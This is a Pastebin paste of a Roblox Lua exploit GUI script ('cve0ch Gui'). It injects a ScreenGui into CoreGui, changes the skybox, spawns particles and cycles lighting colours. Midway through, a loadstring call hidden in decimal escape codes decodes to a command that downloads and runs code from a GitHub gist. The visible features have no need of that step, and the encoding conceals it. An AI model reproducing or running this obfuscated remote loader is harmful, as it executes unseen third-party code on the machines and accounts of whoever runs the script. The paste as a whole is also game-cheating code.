Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --[[
- WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
- ]]
- local gui = Instance.new("ScreenGui")
- gui.Name = "cve0ch Gui v1"
- gui.Parent = game.CoreGui
- local Frame = Instance.new("Frame")
- Frame.Size = UDim2.new(0.35, 0, 0.8, 0)
- Frame.Position = UDim2.new(0.5, 0, 0.5, 0)
- Frame.BackgroundColor3 = Color3.new(1, 1, 1)
- Frame.BorderColor3 = Color3.fromRGB(213, 115, 61) -- Orange
- Frame.BorderSizePixel = 3
- Frame.Active = true
- Frame.Draggable = true
- Frame.Parent = gui
- local ImageLabel = Instance.new("ImageLabel")
- ImageLabel.Parent = Frame
- ImageLabel.BackgroundColor3 = Color3.fromRGB(0, 0 ,0)
- ImageLabel.BorderColor3 = Color3.fromRGB(27, 27, 27)
- ImageLabel.BackgroundTransparency = 0
- ImageLabel.BorderSizePixel = 0
- ImageLabel.Position = UDim2.new(0.0001, 0, 0.0001, 0)
- ImageLabel.Size = UDim2.new(0.885, 35, 0.83, 54)
- ImageLabel.Image = "http://www.roblox.com/asset/?id=17105222891" -- Updated Background image ID
- ImageLabel.Active = false
- local TextLabel = Instance.new("TextLabel")
- TextLabel.Size = UDim2.new(0.33, 0, 0.1, 0)
- TextLabel.Position = UDim2.new(0.33, 0, 0.00001, 0)
- TextLabel.BackgroundColor3 = Color3.new(0, 0, 0)
- TextLabel.BorderColor3 = Color3.new(0, 0, 0)
- TextLabel.BorderSizePixel = 0
- TextLabel.BackgroundTransparency = 1
- TextLabel.Text = "Cve0ch Gui"
- TextLabel.TextSize = 29
- TextLabel.TextColor3 = Color3.new(255, 255, 255)
- TextLabel.Font = Enum.Font.Code
- TextLabel.Parent = Frame
- local function createButton(text, position, onClick, id)
- local TextButton = Instance.new("TextButton")
- TextButton.Size = UDim2.new(0.3, 0, 0.2, 0)
- TextButton.Position = position
- TextButton.BackgroundColor3 = Color3.new(0, 0, 0)
- TextButton.BorderColor3 = Color3.fromRGB(213, 115, 61) -- Orange
- TextButton.BorderSizePixel = 2
- TextButton.BackgroundTransparency = 0.66
- TextButton.Text = text
- TextButton.TextSize = 23
- TextButton.TextWrapped = true
- TextButton.TextColor3 = Color3.new(255, 255, 255)
- TextButton.Font = Enum.Font.Code
- TextButton.Parent = Frame
- TextButton.MouseButton1Click:Connect(function()
- onClick(id)
- end)
- end
- createButton("Sky", UDim2.new(0.00001, 0, 0.2, 0), function(ID)
- local skybox = true
- if skybox == true then
- local sky = Instance.new("Sky")
- sky.Parent = game.Lighting
- sky.SkyboxBk = "http://www.roblox.com/asset/?id=" .. ID
- sky.SkyboxDn = "http://www.roblox.com/asset/?id=" .. ID
- sky.SkyboxFt = "http://www.roblox.com/asset/?id=" .. ID
- sky.SkyboxLf = "http://www.roblox.com/asset/?id=" .. ID
- sky.SkyboxRt = "http://www.roblox.com/asset/?id=" .. ID
- sky.SkyboxUp = "http://www.roblox.com/asset/?id=" .. ID
- end
- end, 17105222891)
- createButton("Particle", UDim2.new(0.7, 0, 0.2, 0), function(ID)
- local particle = true
- if particle == true then
- for i,v in pairs(game.Workspace:GetChildren()) do
- if v:IsA("Part") then
- local particle = Instance.new("ParticleEmitter")
- particle.Texture = "http://www.roblox.com/asset/?id=" .. ID
- particle.Parent = v
- particle.Rate = 200
- elseif v:IsA("Model") then
- for _, part in pairs(v:GetDescendants()) do
- if part:IsA("Part") then
- local particle = Instance.new("ParticleEmitter")
- particle.Texture = "http://www.roblox.com/asset/?id=" .. ID
- particle.Parent = part
- particle.Rate = 200
- end
- end
- end
- end
- end
- end, 17105222891)
- --gegadi skibidi Ohio rizzler
- loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
- while true do
- wait(0.5)
- game.Lighting.Ambient = Color3.new(math.random(), math.random(), math.random())
- game.Lighting.ColorShift_Top = Color3.new(math.random(), math.random(), math.random())
- game.Lighting.ColorShift_Bottom = Color3.new(math.random(), math.random(), math.random())
- game.Lighting.ShadowColor = Color3.new(math.random(), math.random(), math.random())
- end
Advertisement
Add Comment
Please, Sign In to add comment